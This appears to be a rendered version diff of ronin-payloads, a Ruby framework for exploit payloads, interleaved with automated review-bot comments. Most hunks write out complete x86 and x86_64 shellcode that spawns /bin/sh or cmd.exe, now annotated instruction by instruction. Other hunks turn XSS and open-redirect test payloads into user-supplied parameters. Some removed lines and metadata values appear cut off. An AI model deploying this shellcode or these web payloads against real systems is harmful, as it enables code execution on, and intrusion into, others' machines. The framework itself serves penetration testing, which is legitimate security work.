"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54" \
|
61
|
-
"\x5f\x6a\x3b\x58\x0f\x05"
|
62
|
+
"\x5f\x6a\x3b\x58\x0f\x05"
|
62
63
|
end
|
63
64
|
|
64
65
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -55,7 +56,7 @@ module Ronin
|
|
55
56
|
@payload = "\x48\x31\xd2\x48\xc7\xc0\xf6\xff\xff\x01" \
|
56
57
|
"\x48\x83\xc0\x45\x5f\x52\x57\x48\x89\xe6" \
|
57
58
|
"\x0f\x05\xe8\xe5\xff\xff\xff\x2f\x62\x69" \
|
58
|
-
"\x6e\x2f\x2f\x73\x68"
|
59
|
+
"\x6e\x2f\x2f\x73\x68"
|
59
60
|
end
|
60
61
|
|
61
62
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -60,7 +61,7 @@ module Ronin
|
|
60
61
|
"\xe8\x08\x48\x31\xf6\x4c\x89\xc0\x4c\x89\xe7\x0f\x05\x48\x83" \
|
61
62
|
"\xfe\x02\x48\xff\xc6\x76\xef\x49\x83\xe8\x1f\x4c\x89\xc0\x48" \
|
62
63
|
"\x31\xd2\x49\xbd\xff\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xed" \
|
63
|
-
"\x08\x41\x55\x48\x89\xe7\x48\x31\xf6\x0f\x05"
|
64
|
+
"\x08\x41\x55\x48\x89\xe7\x48\x31\xf6\x0f\x05"
|
64
65
|
end
|
65
66
|
|
66
67
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -74,7 +75,7 @@ module Ronin
|
|
74
75
|
"\x01\x01\x01\x01" \
|
75
76
|
"\x02\x02\x02\x02" \
|
76
77
|
"\x03\x03\x03\x03" \
|
77
|
-
"\x9a\x04\x04\x04\x04\x07\x04"
|
78
|
+
"\x9a\x04\x04\x04\x04\x07\x04"
|
78
79
|
end
|
79
80
|
|
80
81
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -60,7 +61,7 @@ module Ronin
|
|
60
61
|
"\xef\xeb\x23\x5b\x89\x1f\x31\xc9\x88\x4b\x07\x89\x4f\x04\x51\x8d" \
|
61
62
|
"\x07\x50\x8b\x07\x50\x50\x31\xc0\xb0\x3b\xcd\x80\x31\xc9\x51\x51" \
|
62
63
|
"\x31\xc0\xb0\x01\xcd\x80\xe8\xd8\xff\xff\xff\x2f\x62\x69\x6e\x2f" \
|
63
|
-
"\x73\x68\x41\x90"
|
64
|
+
"\x73\x68\x41\x90"
|
64
65
|
end
|
65
66
|
|
66
67
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -52,18 +53,18 @@ module Ronin
|
|
52
53
|
# Builds the shellcode.
|
53
54
|
#
|
54
55
|
def build
|
55
|
-
@payload = "\x99"
|
56
|
-
"\x52"
|
57
|
-
"\x68\x6e\x2f\x73\x68"
|
58
|
-
"\x68\x2f\x2f\x62\x69"
|
59
|
-
"\x89\xe3"
|
60
|
-
"\x52"
|
61
|
-
"\x54"
|
62
|
-
"\x53"
|
63
|
-
"\x53"
|
64
|
-
"\x6a\x3b"
|
65
|
-
"\x58"
|
66
|
-
"\xcd\x80"
|
56
|
+
@payload = "\x99" + # cltd
|
57
|
+
"\x52" + # push %edx
|
58
|
+
"\x68\x6e\x2f\x73\x68" + # push $0x68732f6e
|
59
|
+
"\x68\x2f\x2f\x62\x69" + # push $0x69622f2f
|
60
|
+
"\x89\xe3" + # mov %esp,%ebx
|
61
|
+
"\x52" + # push %edx
|
62
|
+
"\x54" + # push %esp
|
63
|
+
"\x53" + # push %ebx
|
64
|
+
"\x53" + # push %ebx
|
65
|
+
"\x6a\x3b" + # push $0x3b
|
66
|
+
"\x58" + # pop %eax
|
67
|
+
"\xcd\x80" # int $0x80
|
67
68
|
end
|
68
69
|
|
69
70
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -52,26 +53,26 @@ module Ronin
|
|
52
53
|
# Builds the shellcode.
|
53
54
|
#
|
54
55
|
def build
|
55
|
-
@payload = "\x31\xC9"
|
56
|
-
"\x64\x8B\x71\x30"
|
57
|
-
"\x8B\x76\x0C"
|
58
|
-
"\x8B\x76\x1C"
|
59
|
-
"\x8B\x36"
|
60
|
-
"\x8B\x06"
|
61
|
-
"\x8B\x68\x08"
|
62
|
-
"\xEB\x20"
|
63
|
-
"\x5B"
|
64
|
-
"\x53"
|
65
|
-
"\x55"
|
66
|
-
"\x5B"
|
67
|
-
"\x81\xEB\x11\x11\x11\x11"
|
68
|
-
"\x81\xC3\xDA\x3F\x1A\x11"
|
69
|
-
"\xFF\xD3"
|
70
|
-
"\x81\xC3\x11\x11\x11\x11"
|
71
|
-
"\x81\xEB\x8C\xCC\x18\x11"
|
72
|
-
"\xFF\xD3"
|
73
|
-
"\xE8\xDB\xFF\xFF\xFF"
|
74
|
-
"\x63\x6d\x64"
|
56
|
+
@payload = "\x31\xC9" + # xor ecx,ecx
|
57
|
+
"\x64\x8B\x71\x30" + # mov esi,[fs:ecx+0x30]
|
58
|
+
"\x8B\x76\x0C" + # mov esi,[esi+0xc]
|
59
|
+
"\x8B\x76\x1C" + # mov esi,[esi+0x1c]
|
60
|
+
"\x8B\x36" + # mov esi,[esi]
|
61
|
+
"\x8B\x06" + # mov eax,[esi]
|
62
|
+
"\x8B\x68\x08" + # mov ebp,[eax+0x8]
|
63
|
+
"\xEB\x20" + # jmp short 0x35
|
64
|
+
"\x5B" + # pop ebx
|
65
|
+
"\x53" + # push ebx
|
66
|
+
"\x55" + # push ebp
|
67
|
+
"\x5B" + # pop ebx
|
68
|
+
"\x81\xEB\x11\x11\x11\x11" + # sub ebx,0x11111111
|
69
|
+
"\x81\xC3\xDA\x3F\x1A\x11" + # add ebx,0x111a3fda (for seven X86 add ebx,0x1119f7a6)
|
70
|
+
"\xFF\xD3" + # call ebx
|
71
|
+
"\x81\xC3\x11\x11\x11\x11" + # add ebx,0x11111111
|
72
|
+
"\x81\xEB\x8C\xCC\x18\x11" + # sub ebx,0x1118cc8c (for seven X86 sub ebx,0x1114ccd7)
|
73
|
+
"\xFF\xD3" + # call ebx
|
74
|
+
"\xE8\xDB\xFF\xFF\xFF" + # call dword 0x15
|
75
|
+
"\x63\x6d\x64" # db "cmd"
|
75
76
|
end
|
76
77
|
|
77
78
|
end
|
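Review bot: The new disassembly comments describe 32-bit code — `xor ecx,ecx`, `mov esi,[fs:ecx+0x30]`, `mov ebp,[eax+0x8]` and `pop ebx` all use 32-bit registers and the `fs:` segment — while the diffstat places this file at `shellcode/windows/x86_64/cmd.rb`. If the payload is meant for 32-bit processes on 64-bit Windows the path may be intended, but then the class description (outside this hunk) should say so; otherwise either the path or whatever arch metadata the class declares needs correcting. The two `(for seven X86 …)` remarks on the `add ebx`/`sub ebx` lines also say the hard-coded constants are tied to one Windows build, so the description should state which build the default bytes target rather than leaving that only in an inline comment. The `build` method is complete within the hunk.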
@@ -37,11 +37,14 @@ module Ronin
|
|
37
37
|
Simply redirects to https://google.com/.
|
38
38
|
DESC
|
39
39
|
|
40
|
+
param :url, default: 'https://google.com/',
|
41
|
+
desc: 'The open redirect URL'
|
42
|
+
|
40
43
|
#
|
41
44
|
# Builds the Open Redirect test payload.
|
42
45
|
#
|
43
46
|
def build
|
44
|
-
@payload =
|
47
|
+
@payload = params[:url]
|
45
48
|
end
|
46
49
|
|
47
50
|
end
|
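Review bot: The context line `Simply redirects to https://google.com/.` in the class description is stale now that `build` emits `params[:url]`; with the new `param :url` the address is caller-supplied and `https://google.com/` is only the default, so the description (which starts above this hunk) should read along the lines of `Redirects to the URL given by the url param (default: https://google.com/).` The same applies to the `test/xss` section below, where `Simply calls alert(1)` predates the new `param :javascript`. `build` copies the parameter through verbatim; if the `param` macro supports a type or validation option (not visible on this page), `:url` is a natural candidate so that a malformed value is rejected at parameter time rather than becoming the payload.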
@@ -37,11 +37,14 @@ module Ronin
|
|
37
37
|
Simply calls `alert(1)`.
|
38
38
|
DESC
|
39
39
|
|
40
|
+
param :javascript, default: 'alert(1)',
|
41
|
+
desc: 'The JavaScript to inject'
|
42
|
+
|
40
43
|
#
|
41
44
|
# Builds the XSS test payload.
|
42
45
|
#
|
43
46
|
def build
|
44
|
-
@payload =
|
47
|
+
@payload = params[:javascript]
|
45
48
|
end
|
46
49
|
|
47
50
|
end
|
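--- a/data/lib/ronin/payloads/cli.rb
+++ b/data/lib/ronin/payloads/cli.rb
@@ -20,6 +20,7 @@
 #
 
 require 'ronin/payloads/version'
+require 'ronin/core/cli/help/banner'
 
 require 'command_kit/commands'
 require 'command_kit/commands/auto_load'
@@ -40,6 +41,7 @@ module Ronin
 namespace: "#{self}::Commands"
 )
 include CommandKit::Options::Version
+include Core::CLI::Help::Banner
 
 command_name 'ronin-payloads'
 version Ronin::Payloads::VERSION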
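--- a/metadata
+++ b/metadata
@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: ronin-payloads
 version: !ruby/object:Gem::Version
-version: 0.2.0
+version: 0.2.0
 platform: ruby
 authors:
 - Postmodern
 autorequire:
 bindir: bin
 cert_chain: []
-date: 2024-
+date: 2024-07-22 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
 name: ronin-support
@@ -58,14 +58,14 @@ dependencies:
 requirements:
 - - "~>"
 - !ruby/object:Gem::Version
-version: 0.2
+version: '0.2'
 type: :runtime
 prerelease: false
 version_requirements: !ruby/object:Gem::Requirement
 requirements:
 - - "~>"
 - !ruby/object:Gem::Version
-version: 0.2
+version: '0.2'
 - !ruby/object:Gem::Dependency
 name: ronin-repos
 requirement: !ruby/object:Gem::Requirement
@@ -309,7 +309,7 @@ required_rubygems_version: !ruby/object:Gem::Requirement
 - !ruby/object:Gem::Version
 version: '0'
 requirements: []
-rubygems_version: 3.
+rubygems_version: 3.5.11
 signing_key:
 specification_version: 4
 summary: A Ruby micro-framework for writing and running exploit payloads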